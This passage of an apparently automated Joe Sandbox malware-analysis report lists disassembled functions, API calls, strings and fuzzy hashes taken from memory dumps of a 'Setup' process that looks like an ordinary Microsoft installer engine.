                                                              • DeleteFileW.KERNEL32(00000000,00000000,?,6C490FC5,9F1A557E), ref: 6C4A7C1E
                                                              • GetLastError.KERNEL32(?,6C490FC5,9F1A557E), ref: 6C4A7C28
                                                              • MoveFileW.KERNEL32(?,00000000), ref: 6C4A7C41
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$ChangeCloseErrorFindLastMoveNotification
                                                              • String ID:
                                                              • API String ID: 441735897-0
                                                              • Opcode ID: 23ecf16fc0e3269a42257f7e262d610df6a9882bbd0283cb409b78dd1e38c296
                                                              • Instruction ID: 4f7e466caddc0fe75ffd356d582bf0739bd9e6aad6135cf4a975e8f0ab59a7a5
                                                              • Opcode Fuzzy Hash: 23ecf16fc0e3269a42257f7e262d610df6a9882bbd0283cb409b78dd1e38c296
                                                              • Instruction Fuzzy Hash: 42F09C3160E1147BDB31EFA5CC04F8A36B89F2339BB010529FA19D5A0CD730C59286D1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C922E4F
                                                                • Part of subcall function 6C949653: _free.LIBCMT ref: 6C949698
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_free
                                                              • String ID: evaluated to false$ evaluated to true$BlockIf
                                                              • API String ID: 2248394366-2909538125
                                                              • Opcode ID: 5ea2a185b0d4e898a7e79e9c5ca463e7139b6158166b51a9232900d64564063d
                                                              • Instruction ID: 683fdbf7a4a0a7a61bde655fb15044bbec40cab1639e7d053d0e0ed50c19426f
                                                              • Opcode Fuzzy Hash: 5ea2a185b0d4e898a7e79e9c5ca463e7139b6158166b51a9232900d64564063d
                                                              • Instruction Fuzzy Hash: 75A1A370900209DFCF10CFA8C984ADEBBB5FF69318F144599E454ABB91C735EA0ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9445A2
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C918129: SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C91AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C918149
                                                              Strings
                                                              • .htm, xrefs: 6C944763
                                                              • Cannot get valid temp folder, xrefs: 6C94456D
                                                              • Cannot create file or delete file in Temp directory , xrefs: 6C9445C5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8FilePointerThrow
                                                              • String ID: .htm$Cannot create file or delete file in Temp directory $Cannot get valid temp folder
                                                              • API String ID: 1975055723-2150540039
                                                              • Opcode ID: 1d5969c5b4ff67202e95eb496dc5ea7322c3a182da00ac6090172c66be00167d
                                                              • Instruction ID: e7718a9bafc7b8a14e604d86bc8e7434094bcf47659c65abbf0c9492811933bf
                                                              • Opcode Fuzzy Hash: 1d5969c5b4ff67202e95eb496dc5ea7322c3a182da00ac6090172c66be00167d
                                                              • Instruction Fuzzy Hash: 9FA18C711083459FD704DFA8C840B8EBBE8BFA5328F044A1EF4A4D7B90DB74D5098B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932E83
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C932DBC: __EH_prolog3.LIBCMT ref: 6C932DC3
                                                                • Part of subcall function 6C9491D4: __EH_prolog3.LIBCMT ref: 6C9491DB
                                                                • Part of subcall function 6C9491D4: __recalloc.LIBCMT ref: 6C94921D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: No ProcessBlock element$ProcessBlock added$ProcessBlocks
                                                              • API String ID: 1900422986-3251087430
                                                              • Opcode ID: 1dd33608ec10c6e73cdab556a61aea9a4b6c4f4ce76bb1077538d4df4efa88b4
                                                              • Instruction ID: 42a9461684e2ca6dad39c4862c7b9c5e46385a6641a2f2d7d8c42c58630fdb22
                                                              • Opcode Fuzzy Hash: 1dd33608ec10c6e73cdab556a61aea9a4b6c4f4ce76bb1077538d4df4efa88b4
                                                              • Instruction Fuzzy Hash: F3716270A00249DFDF00CFA8C984AAEBBB5BF59308F144469E515EB791C735DE45CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9331CB
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C933104: __EH_prolog3.LIBCMT ref: 6C93310B
                                                                • Part of subcall function 6C9491D4: __EH_prolog3.LIBCMT ref: 6C9491DB
                                                                • Part of subcall function 6C9491D4: __recalloc.LIBCMT ref: 6C94921D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: No ServiceBlock element$ServiceBlock added$ServiceBlocks
                                                              • API String ID: 1900422986-3373415214
                                                              • Opcode ID: 18442fa0bc6cfe61d621d6cc550c2b7c6e71a0184a8a83d1bc09645ba811a132
                                                              • Instruction ID: 1039bfb125b7db6e1ad702bf40a282fafc62f5065e40d375da76749c516acc15
                                                              • Opcode Fuzzy Hash: 18442fa0bc6cfe61d621d6cc550c2b7c6e71a0184a8a83d1bc09645ba811a132
                                                              • Instruction Fuzzy Hash: D9714070A00249DFDF00CFA8C984AAEBBB5BF59308F248569E515EB791CB30DE45CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C9472EB
                                                                • Part of subcall function 6C9143C4: __EH_prolog3.LIBCMT ref: 6C9143CB
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948ED0: __EH_prolog3.LIBCMT ref: 6C948ED7
                                                                • Part of subcall function 6C948ED0: PathFindExtensionW.SHLWAPI(?,00000004,6C947362,?,?,?,00000000,?,?), ref: 6C948F01
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C943B2B: __EH_prolog3.LIBCMT ref: 6C943B32
                                                                • Part of subcall function 6C943B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C94EC79,?,?), ref: 6C943BC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CriticalExtensionFindH_prolog3_catchInitializePathSection_malloc
                                                              • String ID: .htm$.html$.txt
                                                              • API String ID: 2678321574-1806469533
                                                              • Opcode ID: 20952834c6afaf6bd08c881262e62e114e964cbfc2392a6a52f429375e25e6b2
                                                              • Instruction ID: 15b0bddd268d89b48874d424d6e4d577fb8cb63a342c50634bc0611c200ab747
                                                              • Opcode Fuzzy Hash: 20952834c6afaf6bd08c881262e62e114e964cbfc2392a6a52f429375e25e6b2
                                                              • Instruction Fuzzy Hash: 3351A130904249DEEF10DBA9C904BEDBBE9AF25318F108556E454EBBC1D774DA08CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C4A7ACF: GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 6C4A7AFC
                                                                • Part of subcall function 6C490ECA: SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 6C490F06
                                                              • PathFileExistsW.SHLWAPI(?,?,9F1A557E), ref: 6C491126
                                                              • ShellExecuteW.SHELL32(00000001,print,?,00000000,00000000,00000000), ref: 6C49116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExecuteExistsFileH_prolog3MessageSendShellTemp
                                                              • String ID: %s\BlockersInfo%d.rtf$print
                                                              • API String ID: 2742019059-575943144
                                                              • Opcode ID: 7146ff5e2f000193fea63cbf9024d5f2294b80299320bd3e55e24d955a7d603c
                                                              • Instruction ID: 9b35a1e7cb952faae61c709a2eddaf67aa7b650aceb3f19b2d6e46adb2258ed2
                                                              • Opcode Fuzzy Hash: 7146ff5e2f000193fea63cbf9024d5f2294b80299320bd3e55e24d955a7d603c
                                                              • Instruction Fuzzy Hash: 61414E725082459FD710DFA8C844E9FBBE8FF89718F040A2DF498A7750D730D91A8BA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last
                                                              • String ID: DW\DW20.exe$Failed to record SetupFlags
                                                              • API String ID: 685212868-3543485478
                                                              • Opcode ID: 0d4f84211ff0e506865e46b9836dff087400a0136ca6f4e889873cf5dda03241
                                                              • Instruction ID: afc8fc815f6aae28807af0b9ca01d5e5d7974773efcfe05fcdf531b204b53958
                                                              • Opcode Fuzzy Hash: 0d4f84211ff0e506865e46b9836dff087400a0136ca6f4e889873cf5dda03241
                                                              • Instruction Fuzzy Hash: 9B41AF71900209DFDB14DBB8C845ADEBBB9BF66318F148656E411EBBC1CB34DA09C7A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C623E94
                                                              • RegQueryValueExW.KERNEL32(00000000,00000002,00000000,?,?,00000004), ref: 6C623EB0
                                                              • RegCloseKey.KERNEL32(00000000), ref: 6C623ECE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: CEIPEnable
                                                              • API String ID: 3677997916-1389088331
                                                              • Opcode ID: da6be7f1470f547f5543649edb506afc40f7393d6b2345e1c999d1991eb97b36
                                                              • Instruction ID: 8467cd84aa9ee7b41bb2cf39830445b119232e51f5dd7fea4e6a4802f8b8aac3
                                                              • Opcode Fuzzy Hash: da6be7f1470f547f5543649edb506afc40f7393d6b2345e1c999d1991eb97b36
                                                              • Instruction Fuzzy Hash: 98310432A44168EFCB119F45CC80F997B75EB4178DF208065E914AB8B1C37ACD849F5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953440
                                                              • PathStripToRootW.SHLWAPI(00000000,C600000B,6C94FA6E,00000010,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C9534D8
                                                              • GetLastError.KERNEL32(?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95350D
                                                              Strings
                                                              • Failed to record SystemMemory, xrefs: 6C953527
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3LastPathRootStrip
                                                              • String ID: Failed to record SystemMemory
                                                              • API String ID: 1831876552-335854511
                                                              • Opcode ID: a2580c3664d5ab734858e7590064295a12d2296f13fb28312f48cb2851e22eea
                                                              • Instruction ID: db6989208612821102d866ffbd73b46a7a95e5c98d8bec87b9490df87fbff001
                                                              • Opcode Fuzzy Hash: a2580c3664d5ab734858e7590064295a12d2296f13fb28312f48cb2851e22eea
                                                              • Instruction Fuzzy Hash: 1131BE71A001169BDF04DFB5C8899EEBB79BF26328F500614E524E7BD0CB34D919CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C947CA5
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91391D: __EH_prolog3.LIBCMT ref: 6C913924
                                                                • Part of subcall function 6C91395E: __EH_prolog3.LIBCMT ref: 6C913965
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Package Name = %s$Package Version = %s$Package details
                                                              • API String ID: 431132790-2412997842
                                                              • Opcode ID: 29f0d547a165a4af1aa7fabb7b58f28e9a273f36fe0d08a24d65d62e6e95395a
                                                              • Instruction ID: 77f48b1913cc5d3ec927287f580152fdba0a32436a44d53dbdcf6516ee02d5d6
                                                              • Opcode Fuzzy Hash: 29f0d547a165a4af1aa7fabb7b58f28e9a273f36fe0d08a24d65d62e6e95395a
                                                              • Instruction Fuzzy Hash: 1831887190014AEFDF00CBA8C948BEDBBB5BF22308F144545E114BBB91C771EA19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917132
                                                              • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,00000010), ref: 6C917191
                                                              • #195.MSI(00000010,00000000,00000104,00000000,00000000,00000104,00000010,MSI.dll), ref: 6C917200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: #195FolderH_prolog3Path
                                                              • String ID: MSI.dll
                                                              • API String ID: 2462876523-3845536143
                                                              • Opcode ID: ec921b735ca139facfb3a41e0bdb8ff504c8ee32c632c050979ca54666e5d6f4
                                                              • Instruction ID: 990c8dec311bbc5a0b5f794653255430c5e97262405e204119f83c80fcb64ae2
                                                              • Opcode Fuzzy Hash: ec921b735ca139facfb3a41e0bdb8ff504c8ee32c632c050979ca54666e5d6f4
                                                              • Instruction Fuzzy Hash: 8A316E70A102099BDF04DFA4C888AFEBBB5BF65318F144559E410ABB90C774DA098BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C9476A7: __EH_prolog3.LIBCMT ref: 6C9476AE
                                                                • Part of subcall function 6C9476A7: GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C94F845,?), ref: 6C947748
                                                                • Part of subcall function 6C9476A7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C947758
                                                                • Part of subcall function 6C9476A7: SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C94776D
                                                                • Part of subcall function 6C9476A7: SetUnhandledExceptionFilter.KERNEL32(6C95416A), ref: 6C947774
                                                                • Part of subcall function 6C9476A7: GetCommandLineW.KERNEL32 ref: 6C94777A
                                                              • _memset.LIBCMT ref: 6C94F85B
                                                              • GetEnvironmentVariableW.KERNEL32(DebugIronMan,?,000000FF,?,?,?), ref: 6C94F874
                                                              • DebugBreak.KERNEL32(?,?,?), ref: 6C94F8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressBreakCommandDebugEnvironmentExceptionFilterGuaranteeH_prolog3HandleLineModuleProcStackThreadUnhandledVariable_memset
                                                              • String ID: DebugIronMan
                                                              • API String ID: 12115070-628588297
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetTokenInformation.KERNELBASE(?,/3bl,00000000,00000000,00000000,00000000,00000000,?,?,6C6236C7,?,00000001), ref: 6C622835
                                                              • GetLastError.KERNEL32(?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C62283B
                                                                • Part of subcall function 6C621967: malloc.MSVCRT(?,6C640554), ref: 6C621979
                                                              • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C622863
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$ErrorLastmalloc
                                                              • String ID: /3bl
                                                              • API String ID: 3066823155-3975618539
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 6C623D28
                                                                • Part of subcall function 6C62182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C622E5E,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C621897
                                                                • Part of subcall function 6C62182C: RegQueryValueExW.KERNEL32(6C622E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C6218B3
                                                                • Part of subcall function 6C62182C: RegCloseKey.KERNEL32(6C622E5E,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C6218D1
                                                              • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,UserId,?,00000027), ref: 6C623D74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                              • String ID: Software\Microsoft\SQMClient$UserId
                                                              • API String ID: 895213837-3032788761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 6C622E34
                                                                • Part of subcall function 6C62182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C622E5E,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C621897
                                                                • Part of subcall function 6C62182C: RegQueryValueExW.KERNEL32(6C622E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C6218B3
                                                                • Part of subcall function 6C62182C: RegCloseKey.KERNEL32(6C622E5E,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C6218D1
                                                              • SetLastError.KERNEL32(00000000,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C622E80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                              • String ID: MachineId$Software\Microsoft\SQMClient
                                                              • API String ID: 895213837-1718750536
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C62332F,?), ref: 6C623683
